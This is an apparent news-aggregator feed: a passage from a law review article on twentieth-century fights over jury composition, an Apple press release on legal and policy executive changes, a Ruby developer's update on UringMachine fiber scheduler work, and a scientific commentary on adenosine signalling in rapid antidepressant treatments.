The primary focus of this Article is to track how these efforts reshaped the American jury, but it also illuminates how fights over the jury box prefigured and sometimes directly influenced developments in other areas of American law. When Euel Lee’s Communist lawyer persuaded Maryland’s high court to vacate his murder conviction in 1931, for example, Lee successfully argued that the implicit biases of the white judge who compiled the jury lists rendered the process unlawful, decades before such terminology would enter popular usage. 59 Thurgood Marshall—who, as a recent law-school graduate, was tangentially involved in the case—would use strikingly similar language fifty-five years later in arguing for the abolition of race-based peremptory strikes in Batson v. Kentucky. 60 The jury challenge made by the Communists in the Foley Square Trial essentially anticipated the modern fair-cross-section doctrine that would solidify within two decades’ time. And, as mentioned above, the Waller and White cases both involved groundbreaking attempts to expand the scope of the Equal Protection Clause to classifications based on wealth and sex, respectively. Though largely forgotten today, feminist activists regarded the latter as the “Brown v. Board of Education for women” when it was first issued. 61 Far from a backwater, throughout the twentieth century, the law of the jury served as a key battleground for those contesting the subordination of workers, racial minorities, and women. It provided a foundational site of struggle for those who understood all three phenomena as intertwined features of American political economy.

1 Taylor v. Louisiana, 419 U.S. 522, 527, 535 (1975).

2 Jury Selection and Service Act of 1968, Pub. L. No. 90-274, § 101, 82 Stat. 53, 54 (codified at …

3 Williams v. Florida, 399 U.S. 78, 100 (1970).

4 Duren v. Missouri, 439 U.S. 357, 371 (1979) (Rehnquist, J., dissenting) (“[U]nder Sixth Amendmen…

5 See, e.g. , Holland v. Illinois, 493 U.S. 474, 483 (1990); Taylor , 419 U.S. at 538; Fay v. New Yor…

6 See, e.g., People v. Wheeler, 583 P.2d 748, 759-60, 762 (Cal. 1978) (“[T]he goal of an impartial…

7 See, e.g. , Calder McHugh, How Much Do We Really Know About the Trump Jury? , Politico Mag. (Apr. 1…

8 Philip Bump, The Chauvin Jurors Deserve Better than Partisan Armchair Assessments of Their Decisio…

9 See Jeffrey Abramson, We, the Jury: The Jury System and the Ideal of Democracy 99 (1994) (“The c…

10 Ala. Code § 8603 (1923); see also Hale, supra note 9, at 140 (“In the traditional view, jurors…

11 See infra notes 87-112 and accompanying text.

12 United States v. Dennis, 183 F.2d 201, 224 (2d Cir. 1950).

14 Berghuis v. Smith, 559 U.S. 314, 334 (2010) (Thomas, J., concurring).

15 Richard M. Re, Re-Justifying the Fair Cross Section Requirement: Equal Representation and Enfranch…

16 Jenny E. Carroll, The Jury as Democracy , 66 Ala. L. Rev. 825, 831 n.15 (2015) (quoting 2 Charles F…

17 See, e.g. , Thomas Ward Frampton, The First Black Jurors and the Integration of the American Jury ,…

18 See Abramson, supra note 9, at 108.

19 For a rough contemporary analogue, many would recognize the federal legislature as “representati…

20 See, e.g. , Veto It , Oregonian, Mar. 4, 1937, at 10 (“It is said . . . that the regi…

21 Abramson, supra note 9, at 117 (“Matters stood in this mixed position until the civil rights mov…

22 Hale, supra note 9, at 193-206; Abramson, supra note 9, at 99-142. An important exception—one of…

23 Smith v. Texas, 311 U.S. 128, 130 (1940).

24 See, e.g. , Glasser v. United States, 315 U.S. 60, 86 (1942).

25 See Thiel v. S. Pac. Co., 328 U.S. 217, 225 (1946).

26 See Ballard v. United States, 329 U.S. 187, 193 (1946).

27 Duncan v. Louisiana, 391 U.S. 145, 149 (1968).

28 On historical accounts adopting a “long civil rights movement” perspective, see, for example, …

29 See infra notes 135, 148, 185, 196, 213, 348 and accompanying text; see also Gilbert King, Devil i…

30 To be sure, the frequency with which radical litigants played a key role in important and high-pro…

31 To offer just one example, the advent of scientific polling techniques in the late 1930s, coupled …

32 See Lani Guinier & Gerald Torres, Changing the Wind: Notes Toward a Demosprudence of Law and Socia…

33 See infra notes 66-77, 128-138 and accompanying text.

34 Gilmore, supra note 28, at 99.

35 See, e.g. , id. at 106-56. See generally James Goodman, Stories of Scottsboro (1994) (providing the…

36 See infra Section II.A.

37 See infra Section II.B.

38 See infra notes 144-244 and accompanying text.

39 See infra notes 249-257 and accompanying text.

40 See infra notes 316-320 and accompanying text.

41 See infra notes 330-334 and accompanying text.

42 See generally Mary L. Dudziak, Cold War Civil Rights: Race and the Image of American Democracy (20…

43 Dennis v. United States, 341 U.S. 494, 516 (1951) (holding that the First Amendment does not exten…

44 Joint Appendix at *13038-39, United States v. Dennis, 183 F.2d 201 (2d Cir. 1950) (No. 242).

45 See Jury Selection and Service Act of 1968, Pub. L. No. 90-274, § 101, 82 Stat. 53, 54-56 (codif…

46 251 F. Supp. 401 (M.D. Ala. 1966).

47 See infra notes 471-478 and accompanying text.

48 See Serena Mayeri, Reasoning from Race: Feminism, Law, and the Civil Rights Revolution 3-4 (2011).

49 See infra notes 339-341 and accompanying text. I use she/her pronouns for Pauli Murray in this pie…

50 See Reynolds, supra note 28, at 2-3.

51 See Joseph Fronczak, Everything is Possible 185 (2023) (“The older historiographical answer, sha…

52 Michael Denning, The Cultural Front: The Laboring of American Culture in the Twentieth Century, at…

53 Barrett, supra note 51, at 533 (“The Popular Front strategy had been evolving on a local and nat…

54 See Denning, supra note 52, at 21-27, 463-72 (discussing periodization); Reynolds, supra note 28, …

55 Reynolds, supra note 28, at 3.

56 Denning, supra note 52, at 66.

57 Id. at 125 (“[T]he Popular Front combined three distinctive political tendencies: a social democ…

58 Those figures include Ben Davis, Jr., profiled in Parts II and IV, and Pauli Murray, profiled in P…

59 See infra Section II.A; see also B. Keith Payne & Bertram Gawronski, A History of Implicit Social …

60 See Batson v. Kentucky, 476 U.S. 79, 106 (1986) (Marshall, J., concurring).

61 See infra text accompanying note 498.


Apple Announces a Few Other Executive Transitions

Daring Fireball
www.apple.com
2025-12-05 22:18:12
Apple Newsroom, yesterday: Apple today announced that Jennifer Newstead will become Apple’s general counsel on March 1, 2026, following a transition of duties from Kate Adams, who has served as Apple’s general counsel since 2017. She will join Apple as senior vice president in January, reporting...
Original Article
PRESS RELEASE December 4, 2025

Apple announces executive transitions

Jennifer Newstead to join Apple as senior vice president, will become general counsel in March 2026

Kate Adams to retire late next year

Lisa Jackson to retire

CUPERTINO, CALIFORNIA – Apple today announced that Jennifer Newstead will become Apple’s general counsel on March 1, 2026, following a transition of duties from Kate Adams, who has served as Apple’s general counsel since 2017. She will join Apple as senior vice president in January, reporting to CEO Tim Cook and serving on Apple’s executive team.
In addition, Lisa Jackson, vice president for Environment, Policy, and Social Initiatives, will retire in late January 2026. The Government Affairs organization will transition to Adams, who will oversee the team until her retirement late next year, after which it will be led by Newstead. Newstead’s title will become senior vice president, General Counsel and Government Affairs, reflecting the combining of the two organizations. The Environment and Social Initiatives teams will report to Apple chief operating officer Sabih Khan.
“Kate has been an integral part of the company for the better part of a decade, having provided critical advice while always advocating on behalf of our customers’ right to privacy and protecting Apple’s right to innovate,” said Tim Cook, Apple’s CEO. “I am incredibly grateful to her for the leadership she has provided, for her remarkable determination across a myriad of highly complex issues, and above all, for her thoughtfulness, her deeply strategic mind, and her sound counsel.”
“I am deeply appreciative of Lisa’s contributions. She has been instrumental in helping us reduce our global greenhouse emissions by more than 60 percent compared to 2015 levels,” said Cook. “She has also been a critical strategic partner in engaging governments around the world, advocating for the best interests of our users on a myriad of topics, as well as advancing our values, from education and accessibility to privacy and security.”
“We couldn’t be more pleased to have Jennifer join our team,” said Cook. “She brings an extraordinary depth of experience and skill to the role, and will advance Apple’s important work all over the world. We are also pleased that Jennifer will be overseeing both the Legal and Government Affairs organizations, given the increasing overlap between the work of both teams and her substantial background in international affairs. I know she will be an excellent leader going forward.”
“I have long admired Apple’s deep focus on innovation and strong commitment to its values, its customers, and to making the world a better place,” said Newstead. “I am honored to join the company and to lead an extraordinary team who are dedicated each and every day to doing what’s in the best interest of Apple’s users.”
“It has been one of the great privileges of my life to be a part of Apple, where our work has always been about standing up for the values that are the foundation of this great company,” said Adams. “I am proud of the good our wonderful team has done over the past eight years, and I am filled with gratitude for the chance to have made a difference. Jennifer is an exceptional talent and I am confident that I am leaving the team in the very best hands, and I’m really looking forward to working more closely with the Government Affairs team.”
“Apple is a remarkable company and it has been a true honor to lead such important work here,” said Jackson. “I have been lucky to work with leaders who understand that reducing our environmental impact is not just good for the environment, but good for business, and that we can do well by doing good. And I am incredibly grateful to the teams I’ve had the privilege to lead at Apple, for the innovations they’ve helped create and inspire, and for the advocacy they’ve led on behalf of our users with governments around the world. I have every confidence that Apple will continue to have a profoundly positive impact on the planet and its people.”
Newstead was most recently chief legal officer at Meta and previously served as the legal adviser of the U.S. Department of State, where she led the legal team responsible for advising the Secretary of State on legal issues affecting the conduct of U.S. foreign relations. She held a range of other positions in government earlier in her career as well, including as general counsel of the White House Office of Management and Budget, as a principal deputy assistant attorney general of the Office of Legal Policy at the Department of Justice, as associate White House counsel, and as a law clerk to Justice Stephen Breyer of the U.S. Supreme Court. She also spent a dozen years as partner at Davis Polk & Wardwell LLP, where she advised global corporations on a wide variety of issues. Newstead holds an AB from Harvard University and a JD from Yale Law School.

OSS Friday Update - The Shape of Ruby I/O to Come

Lobsters
noteflakes.com
2025-12-05 22:12:36
Comments...
Original Article

05·12·2025

I’m currently doing grant work for the Japanese Ruby Association on UringMachine, a new Ruby gem that provides a low-level API for working with io_uring. As part of my work I’ll be providing weekly updates on this website. Here’s what I did this week:

  • Last week I wrote about the work I did under the guidance of Samuel Williams to improve the behavior of fiber schedulers when forking. After discussing the issues around forking with Samuel, we decided that the best course of action would be to remove the fiber scheduler after a fork. Samuel did work around cleaning up schedulers in threads that terminate on fork, and I submitted a PR for removing the scheduler from the active thread on fork, as well as resetting the fiber to blocking mode. This is my first contribution to Ruby core!

  • I continued implementing the missing fiber scheduler hooks: #fiber_interrupt , #address_resolve , #timeout_after . For the most part, they were simple to implement; I probably spent most of my time figuring out how to test them rather than implementing them. Most of the hooks involve just a few lines of code, and many consist of a single line calling into the relevant UringMachine low-level API.

  • Implemented the #io_select hook, which involved implementing a low-level UM#select method. This method took some effort, since it needs to handle an arbitrary number of file descriptors to check for readiness: we need to create a separate SQE for each fd we want to poll, and when one or more CQEs arrive for polled fds, we also need to cancel all poll operations that have not completed.

    Since IO.select is often called with just a single IO, I also added a special-case implementation of UM#select that handles a single fd (see the sketch after this list).

  • Implemented a worker pool for performing blocking operations in the scheduler. Up until now, each scheduler started its own worker thread for performing blocking operations for use in the #blocking_operation_wait hook. The new implementation uses a worker thread pool shared by all schedulers, with the worker count limited to the CPU count; workers are started only when needed (a sketch of the pool pattern follows this list).

    I also added an optional entries argument to set the SQE and CQE buffer sizes when starting a new UringMachine instance. The default size is 4096 SQE entries (liburing by default makes the CQE buffer size double that of the SQE buffer). The blocking operations worker threads specify a value of 4 since they only use their UringMachine instance for popping jobs off the job queue and pushing the blocking operation result back to the scheduler.

  • Added support for file_offset argument in UM#read and UM#write in preparation for implementing the #io_pread and #io_pwrite hooks. The UM#write_async API, which permits writing to a file descriptor without waiting for the operation to complete, got support for specifying length and file_offset arguments as well. In addition, UM#write and UM#write_async got short-circuit logic for writes with a length of 0.

  • Added support for specifying buffer offset in #io_read and #io_write hooks, and support for timeout in #block , #io_read and #io_write hooks.

  • I found and fixed a problem with how futex_wake was done in the low-level UringMachine code handling mutexes and queues. This fixed a deadlock in the scheduler background worker pool where clients of the pool were not properly woken after the submitted operation was done.

  • I finished work on the #io_pread and #io_pwrite hooks. Unfortunately, the test for #io_pwrite consistently hangs (not in IO#pwrite itself, but rather on closing the file). With Samuel’s help, hopefully we’ll find a solution…

  • With those two last hooks, the fiber scheduler implementation is now feature complete!
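To make the #io_select work concrete, here is a minimal sketch of a hook with a single-fd fast path of the kind described above. It is illustrative only: the low-level method names and signatures (UM#poll, UM#select) are assumptions made for the sake of the example, not necessarily UringMachine’s actual API.

require 'uringmachine'

# Sketch of a fiber scheduler fragment; only the #io_select hook is shown.
class SketchScheduler
  def initialize
    @machine = UM.new
  end

  # Hook invoked by IO.select when a fiber scheduler is set. Ruby passes
  # the readable/writable/priority IO arrays and the timeout through.
  def io_select(readables, writables, exceptables, timeout)
    if readables.size == 1 && writables.empty? && exceptables.empty?
      # Fast path: a single fd needs one poll operation and none of the
      # multi-SQE cancellation bookkeeping.
      @machine.poll(readables.first.fileno, :read, timeout) # assumed API
      [readables, [], []]
    else
      # General path: one poll SQE per fd; when the first CQE arrives,
      # outstanding poll operations must be cancelled.
      @machine.select(readables, writables, exceptables, timeout) # assumed API
    end
  end
end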
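The shared blocking-operation pool can likewise be pictured in plain Ruby. The sketch below captures the shape described above (a process-wide job queue, lazily started workers, a CPU-count cap); it is a simplification, not the actual UringMachine implementation, which coordinates its workers through its own queues and futex wakeups.

require 'etc'
require 'digest'

# One pool shared by every scheduler in the process.
module BlockingPool
  MAX_WORKERS = Etc.nprocessors
  @jobs    = Thread::Queue.new
  @workers = []
  @lock    = Mutex.new

  # Run a blocking job off the event loop and return its result.
  def self.submit(&job)
    result = Thread::Queue.new
    @lock.synchronize do
      # Start another worker only if no worker is idle and we are under the cap.
      if @workers.size < MAX_WORKERS && @jobs.num_waiting.zero?
        @workers << Thread.new { loop { @jobs.pop.call } }
      end
    end
    @jobs << -> { result << job.call }
    result.pop # the caller blocks here; a real scheduler would park the fiber instead
  end
end

# Usage: hash a file without stalling the event loop.
puts BlockingPool.submit { Digest::SHA256.file(__FILE__).hexdigest }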

Why is The Fiber Scheduler Important?

I think there is some misunderstanding around the Ruby fiber scheduler interface. It is the only Ruby API that lacks a built-in implementation in Ruby itself, instead requiring an external library or gem. The question was raised recently on Reddit: why doesn’t Ruby include an “official” implementation of the fiber scheduler?

I guess Samuel is really the person to ask this, but personally I would say this is really about experimentation, and seeing how far we can take the idea of a pluggable I/O implementation. Also, the open-ended design of this interface means that we can use a low-level API such as UringMachine to implement it.

What’s Coming Next Week?

Now that the fiber scheduler is feature complete, I’m looking to make it as robust as possible. For this, I intend to add a lot of tests. Right now, the fiber scheduler has 25 tests with 77 assertions, in about 560LOC (the fiber scheduler itself is at around 220LOC). To me this is not enough, so next week I’m going to add tests for the following:

  • IO - tests for all IO instance methods.
  • working with queues: multiple concurrent readers / writers.
  • net/http test: ad-hoc HTTP/1.1 server + Net::HTTP client.
  • sockets: echo server + many clients.

In conjunction with all those tests, I’ll also start working on benchmarks for measuring the performance of the UringMachine low-level API against the UringMachine fiber scheduler and against the “normal” thread-based Ruby APIs.

In addition, I’m working on a pull request for adding an #io_close hook to the fiber scheduler interface in Ruby. Samuel already did some preparation for this, so I hope I can finish it in time to be merged for the Ruby 4.0 release.

I intend to release UringMachine 1.0 on Christmas, to mark the release of Ruby 4.0.

What About Papercraft?

This week I also managed to take the time to reflect on what I want to do next in Papercraft . I already wrote here about wanting to implement template inlining for Papercraft. I also wanted to rework how the compiled code is generated. I imagined a kind of DSL for code generation, but I didn’t really know what such a DSL would look like.

Then, a few days ago, the idea hit me. I already played with this idea last year, when I wrote Sirop, a sister gem to Papercraft that does a big part of the work of converting code into ASTs and vice versa. Here’s what I put in the readme:

Future directions: implement a macro expander with support for quote/unquote:

trace_macro = Sirop.macro do |ast|
  source = Sirop.to_source(ast)
  quote do
    result = unquote(ast)
    puts "The result of #{source} is: #{result}"
    result
  end
end

def add(x, y)
  trace(x + y)
end

Sirop.expand_macros(method(:add), trace: trace_macro)

The example is trivial and contrived, but I suddenly understood how such an interface could be used to actually generate code in Papercraft. I wrote up an issue for this, and hopefully I’ll have some time to work on it in January.

Adenosine on the common path of rapid antidepressant action: The coffee paradox

Hacker News
genomicpress.kglmeridian.com
2025-12-05 22:10:50
Comments...
Original Article

Introduction

As Claude Bernard understood in laying the foundations of experimental medicine, each scientific generation brings us closer to mechanistic truth, yet complete understanding remains elusive ( 1 ). This has been particularly evident in psychiatric therapeutics, where chance long preceded knowledge. For over twenty years we have had evidence that ketamine is a rapid antidepressant. We knew the electrically charged scalpel of electroconvulsive therapy worked when nothing else did. And we had long suspected that depriving people of sleep benefited them, if only transiently. What we lacked was the mechanistic thread connecting these varied interventions, the common path that might allow for rational, rather than empirical, therapeutic development.

In a study that demonstrates what modern neuroscience can do when technical virtuosity meets conceptual clarity, Yue and colleagues, led by Professor Min-Min Luo, now provide that thread ( 2 ). Using genetically encoded adenosine sensors, a comprehensive genetic and pharmacological dissection, and immediate therapeutic translation, they show that adenosine signalling is the convergent mechanism of rapid-acting antidepressant therapies. This is a new way of thinking about treatment-resistant depression, not merely incremental science.

The technical achievement

The precise timing is what gives the work its compelling quality. The authors applied GRABAdo1.0, a GPCR-based sensor for adenosine, to monitor adenosine changes in mood-regulating circuits in real time ( 2 ). Injection of ketamine (10 mg/kg) and application of electroconvulsive therapy each produced a substantial spike in extracellular adenosine in the medial prefrontal cortex and hippocampus, with peak amplitudes of ∼15% ΔF/F reached at ∼500 s and remaining above baseline for about 30 minutes (Extended Data Fig. 1d–h in ref. 2 ). The regional specificity is also telling. Although adenosine increased in the mPFC and hippocampus, no surge occurred in the nucleus accumbens, implicating affective rather than reward circuits.


Figure 1. Adenosine Signaling: Convergent Mechanisms for Rapid Antidepressants. Three distinct interventions—ketamine (pharmacological), electroconvulsive therapy/ECT (electrical), and acute intermittent hypoxia/aIH (physiological)—converge on a common mechanism: adenosine surges in the medial prefrontal cortex (mPFC). Ketamine triggers adenosine release through metabolic modulation (decreased ATP/ADP ratio) and ENT1/2-mediated efflux, without causing neuronal hyperactivity. ECT produces adenosine surges via neuronal hyperactivity and rapid metabolic demand. aIH generates adenosine through controlled hypoxia in a non-invasive manner. All three interventions activate A1 and A2A adenosine receptors in the mPFC, detected in real-time using fiber photometry with genetically encoded sensors (GRABAdo1.0). This adenosine signaling triggers downstream synaptic plasticity mechanisms (BDNF upregulation, mTOR activation, neuroplasticity), resulting in rapid antidepressant effects with onset in hours and duration lasting days. Clinical Considerations: The adenosine mechanism raises important questions about caffeine consumption patterns. Tonic signaling (chronic/baseline coffee consumption) appears protective against depression and may help prevent depressive episodes. Phasic signaling (acute pre-treatment coffee) raises mechanistic concerns about potential interference with the adenosine surge during ketamine/ECT administration, though this remains speculative and requires clinical validation. The dual nature of caffeine's effects—protective chronically, potentially interfering acutely—reflects the distinction between tonic baseline adenosine receptor modulation and phasic adenosine surge responses to rapid-acting treatments.

Citation: Brain Medicine 2025; 10.61373/bm025c.0134

The dose-response relationships were clear-cut. At 5 mg/kg, ketamine produced modest signals; at 10 and 20 mg/kg, the effects were unmistakable. Higher doses prolonged the response but did not raise the peak amplitude. Two-photon imaging showed the adenosine signal to be spatially diffuse. The kinetics differed from those of acute hypoxia, which the authors used as a positive control. Ketamine at the standard antidepressant dose (10 mg/kg) produced peak amplitudes of approximately 15% ΔF/F, while higher doses (20–50 mg/kg) reached approximately 35% ΔF/F, still substantially lower than the ∼60% ΔF/F observed with acute hypoxia. However, ketamine's decay was much slower, taking more than 500 s compared with roughly 50 s for hypoxia. The lower peak but prolonged duration suggests that ketamine causes sustained metabolic modulation rather than acute cellular stress.

This temporal resolution matters. A single-time-point tissue sample, or a static measure of receptor expression, would have missed an adenosine surge that switches on and off within the hour. Only continuous optical monitoring could reveal the dynamic signal on which the therapy depends.

Determining cause and effect in biology

The rigor of the mechanistic proof is exemplary, with genetic and pharmacological approaches converging on the same conclusion. Adora1 −/− and Adora2a −/− mice lost all antidepressant efficacy of ketamine in two standard tests for depression: the forced swim test, which measures behavioral despair, and the sucrose preference test, which measures anhedonia ( 2 ). The results were not paradigm-specific; the same necessity held in the chronic restraint stress model and the lipopolysaccharide model of inflammatory depression ( 3 , 4 ). Acute pharmacological blockade with the selective antagonists PSB36 (A1) and ZM241385 (A2A) also completely abolished therapeutic responses to ketamine, at both 1 hour and 24 hours post-treatment.

The circuit-specificity is equally convincing. The authors used AAV-mediated CRISPR-Cas9 to deliver sgRNAs targeting Adora1 and Adora2a to the mPFC. Local receptor loss was sufficient to negate the effect of systemic ketamine ( 2 ). This confirms the mPFC as a key node, consistent with its established roles in mood and executive function, now grounded mechanistically.

The sufficiency experiments complete the logical circle. Direct infusion of adenosine into the mPFC produced antidepressant-like effects lasting 24 hours ( 2 ). More elegantly, optogenetic stimulation of astrocytes expressing cOpn5, a tool that triggers Ca²⁺-dependent ATP release and subsequent CD73-mediated adenosine production, produced therapeutic actions, and this effect was extinguished in Nt5e −/− mice lacking CD73 ( 2 , 5 ). Systemic delivery of selective agonists (CHA for A1, CGS21680 for A2A) produced rapid antidepressant responses, with A1 activation alone sufficient to sustain effects for 24 hours ( 2 ).

This mechanism was shown with a degree of thoroughness the field demands but rarely achieves.

Mitochondria, not neuronal hyperactivity

The upstream mechanism represents genuinely novel biology. Rather than generating adenosine through extracellular ATP hydrolysis, ketamine directly modulates mitochondrial function to increase intracellular adenosine, which then exits cells via equilibrative nucleoside transporters (ENT1/2). The authors demonstrate this in isolated mPFC mitochondria incubated with [13C3]pyruvate. Ketamine (≥2 μM, a therapeutically relevant concentration) ( 6 , 7 ) dose-dependently suppressed 13C enrichment of the TCA cycle intermediates fumarate, malate, and aspartate while causing pyruvate to accumulate ( 2 ).

This metabolic brake cascades into adenosine production. Using PercevalHR sensors to measure intracellular ATP/ADP ratios in vivo, they show that ketamine quickly decreases this ratio in CaMKII⁺ pyramidal neurons (largest effect), GABAergic interneurons (transient reduction with rebound), and astrocytes (sustained decrease) ( 2 ). The timing is telling: the ATP/ADP ratio decrease comes before the extracellular adenosine surge, making metabolic perturbation upstream.

Critically, this occurs without neuronal hyperactivity. Using GCaMP8s to record the calcium responses of pyramidal and GABAergic neurons to therapeutic doses of ketamine, the authors found that ketamine at 10 mg/kg did not increase Ca²⁺ signaling in pyramidal neurons and actually decreased the activity of GABAergic interneurons ( 2 ). This overturns the assumption that seizure-like neuronal hyperactivity is necessary for rapid antidepressant action. The mechanism is metabolic modulation driving adenosine efflux via equilibrative nucleoside transporters, not an excitotoxic process.

The authors demonstrate that dipyridamole, an ENT1/2 inhibitor, reduces the ketamine-induced adenosine signal, confirming the role of these transporters ( 2 ). In contrast, genetic depletion of CD73 (which hydrolyzes extracellular ATP to adenosine) has no effect on ketamine-induced adenosine surges. The adenosine arises intracellularly and exits through ENT1/2 transporters along the concentration gradient produced by the metabolic shift.

From mechanism to molecules

This work goes beyond descriptive neuroscience in its immediate therapeutic translation. In the authors' hands, adenosine dynamics serve as a functional biomarker. Building on this, they synthesized 31 ketamine derivatives, systematically varying chemical groups that affect metabolism and receptor binding ( 2 ). Screening identified deschloroketamine (DCK) and deschloro-N-ethyl-ketamine (2C-DCK) as compounds producing 40–80% stronger adenosine signals than ketamine at equivalent doses.

The behavioral consequences followed immediately. DCK produced significant antidepressant effects at 2 mg/kg (versus 10 mg/kg for ketamine) with only minimal hyperlocomotion at that dose, whereas ketamine at 10 mg/kg produced significant hyperlocomotion ( 2 ). This dissociates therapeutic from psychomimetic effects. The enhanced therapeutic index suggests that promoting signaling downstream of adenosine, rather than optimizing nonspecific NMDA receptor blockade, widens the safety window.

The authors provide clear evidence for the dissociation between NMDAR antagonism and adenosine release. Compounds such as 3'-Cl-ketamine blocked NMDARs with high potency (IC₅₀ comparable to ketamine in cortical slice recordings) but did not induce adenosine surges and were ineffective as antidepressants ( 2 ). The correlation between estimated in vivo NMDAR inhibition (derived from ex vivo IC₅₀ values and brain tissue concentrations) and adenosine modulation was non-significant (Pearson r, P = 0.097). NMDAR antagonism is therefore neither necessary nor sufficient; the therapeutic action operates via ketamine's direct mitochondrial effects.

This metabolic evidence is consistent with the parent compound driving adenosine release. In contrast, ketamine's primary metabolites, norketamine and (2R,6R)-hydroxynorketamine, do not produce adenosine responses at equivalent doses ( 2 ). Notably, hydroxynorketamine does show antidepressant properties in some studies ( 8 ). Metabolism matters here: CYP3A4 inhibitors (ketoconazole, ritonavir) potentiated the adenosine signal, whereas CYP2B6 inhibition (ticlopidine) did not ( 2 ).

Electroconvulsive therapy and beyond

The adenosine framework extends beyond ketamine. Seizures induced by electroconvulsive therapy (ECT) in anesthetized mice (40 mA, 100 Hz, 10 s) triggered an adenosine surge in the medial prefrontal cortex (mPFC) comparable in magnitude to ketamine's but with faster kinetics, consistent with ECT producing intense but brief neuronal firing ( 2 ). The requirement for adenosine is the same: Adora1 −/− mice (lacking the adenosine receptor A1) and Adora2a −/− mice (lacking the adenosine receptor A2A) showed neither reduced immobility in the forced swim test nor restored sucrose preference after ECT ( 2 ).

The researchers also found that acute intermittent hypoxia (aIH), a controlled reduction in oxygen consisting of 5 cycles of 9% O₂ for 5 min interspersed with 21% O₂, produces antidepressant effects when administered daily for 3 days, and these effects were entirely dependent on adenosine signaling. Most importantly from a clinical perspective, aIH is non-invasive, has been shown to be safe in other clinical contexts ( 9 ), requires no complex machinery beyond oxygen control, and could be rolled out in low-resourced settings. Adenosine receptor knockout mice showed no antidepressant effects from aIH, indicating that aIH, ketamine, and ECT share the same mechanistic dependence on adenosine signaling ( Figure 1 ) ( 2 ).

The coffee question: Clinical and mechanistic insights

There is a genuine paradox here worth noticing. The most commonly consumed psychoactive drug in the world is caffeine, which functions as an adenosine receptor antagonist ( Figure 2 ). The study explicitly flags “the possibility of dietary caffeine interfering with these treatments” ( 2 , 10 , 11 ). The warning has mechanistic grounding: if activation of adenosine receptors is necessary for therapeutic effectiveness, and caffeine is an adenosine receptor antagonist, then coffee drinking can be expected to blunt treatment response.


Figure 2. The coffee paradox in adenosine-mediated antidepressant action. Depression (left) and coffee consumption (right) are both linked through adenosine signaling (center), creating a pharmacological paradox: chronic coffee drinking appears protective against depression through tonic adenosine receptor modulation, while acute pre-treatment caffeine may attenuate the phasic adenosine surge required for rapid antidepressant responses to ketamine and electroconvulsive therapy.

Citation: Brain Medicine 2025; 10.61373/bm025c.0134

The epidemiological literature paints a different picture. Several meta-analyses indicate that chronic coffee consumption protects against depression. One found a relative risk of 0.757 for coffee and 0.721 for caffeine ( 12 ). Another found an RR of 0.76, with the optimal protective effect at ∼400 mL/day ( 13 ). A risk reduction of 20–25% is not a small effect; many drug treatments do no better.

Ideas based on known pharmacology, but not yet directly tested

The answer may lie in the distinction between tonic and phasic adenosine signaling, and in receptor reserve. Ongoing caffeine use causes a modest (∼20%) upregulation of A1 receptors, and crucially, this upregulation does not impair the receptors' functional signaling capacity when adenosine binds ( 14 ). The receptors remain functional; there are simply more of them.

Furthermore, adenosine receptors show a significant “spare receptor” reserve, estimated at 70–90% for A2A receptors and 10–64% for A1 receptors. This means that 5–10% receptor occupancy can produce approximately 50% of the maximal effect ( 15 , 16 ). When spare receptors are present, an antagonist must occupy more than 95% of receptors to block the response entirely ( 15 ).

The pharmacokinetics of caffeine are relevant here. Caffeine has a half-life of 3–7 hours and peaks 45–60 minutes after ingestion, with receptor occupancy of ∼50–65% between doses in regular consumers ( 11 , 17 ).

Chronic consumption thus produces a tonic effect: receptors are upregulated and the spare receptor reserve is maintained. Occupancy is partial, never complete. Baseline adenosinergic tone may even be augmented in the antagonist's presence, consistent with the epidemiological protection from depression.

Prior caffeine consumption (phasic blockade), by contrast, must be overcome by the adenosine surge that follows ketamine or ECT. With caffeine occupying 50–65% of receptors, considerable but not infinite receptor reserve remains available, so the surge has to work harder: the signal is attenuated, not obliterated.
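A back-of-envelope calculation makes this concrete. Take the standard competitive-antagonism expression for fractional agonist occupancy, and treat the inputs below (caffeine at 60% occupancy on its own; a surge that alone would reach 30% occupancy) as illustrative assumptions rather than values measured in the paper:

\[
\rho_A = \frac{[A]/K_A}{1 + [A]/K_A + [B]/K_B}
\]

Caffeine alone at 60% occupancy gives \([B]/K_B = 0.6/0.4 = 1.5\); a surge that alone reaches \(\rho_A = 0.30\) implies \([A]/K_A = 0.3/0.7 \approx 0.43\). In caffeine's presence, then,

\[
\rho_A = \frac{0.43}{1 + 0.43 + 1.5} \approx 0.15 .
\]

If, as the reserve estimates above suggest, 5–10% occupancy already yields roughly half the maximal effect, an occupancy of ∼15% still drives a substantial, if attenuated, response: blunted, not abolished.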

This pharmacological analysis suggests tailored approaches rather than outright bans.

  • Regular caffeine/coffee use pre-ketamine is probably not contraindicated. Epidemiological data suggest a possible benefit of that use.

  • Having coffee just before the treatment is more concerning. Patients may be advised to undergo a caffeine washout to ensure optimal adenosine receptor availability during the critical adenosine surge.

  • Drinking coffee after treatment is probably safe once the first plasticity mechanisms are already established.

Can we test whether regular coffee drinkers show blunted ketamine responses? Does controlled caffeine washout enhance outcomes? Is there a link between caffeine use and the response? The current paper offers the mechanistic foundation to pose such questions rigorously.

For now, these remain open empirical questions. No quantitative pharmacology yet connects chronic receptor modulation, acute receptor reserve, and surge amplitudes large enough to overcome partial blockade.

What remains unknown

What makes this piece valuable is its honesty about the boundaries of its work. Several questions merit attention.

First, the mechanisms linking acute adenosine surges to sustained plasticity are not well defined. The authors demonstrate that the BDNF upregulation [a key transducer of antidepressant effects ( 18 )] produced by ketamine requires the A1 and A2A receptors ( 2 ), linking adenosine to established pathways of neuroplasticity. Still, how a ∼30-minute adenosine surge produces antidepressant effects lasting days to weeks needs elaboration. HOMER1A activation and stimulation of the mTOR pathway are cited as likely downstream effectors ( 2 , 19 , 20 ), but the full signalling pathway has yet to be defined.

Second, the hippocampal story is incomplete. After ketamine, adenosine levels soared in the hippocampus in a manner comparable to the mPFC ( 2 ). Yet optogenetic induction of adenosine and direct infusion of adenosine into the dorsal hippocampus produced no antidepressant effect ( 2 ). This suggests functional heterogeneity, possibly along the dorsal–ventral axis, with the ventral hippocampus more closely tied to mood circuits and the dorsal hippocampus serving cognitive and spatial functions. The authors rightly highlight the need to investigate this complexity.

Third, adenosine must be integrated with the other proposed ketamine mechanisms: NMDAR antagonism ( 21 ), AMPA receptor potentiation ( 22 ), mTOR activation ( 23 ), and various metabolite effects ( 8 ). The current work shows that adenosine is necessary and sufficient, and that NMDAR blockade dissociates from therapeutic action across derivatives. Although adenosine's position in the signaling cascade remains unclear (whether it operates in parallel with, upstream of, or downstream from other mechanisms), the authors' data suggest that adenosine may be the primary initiating signal, with other mechanisms as downstream consequences; this remains to be validated.

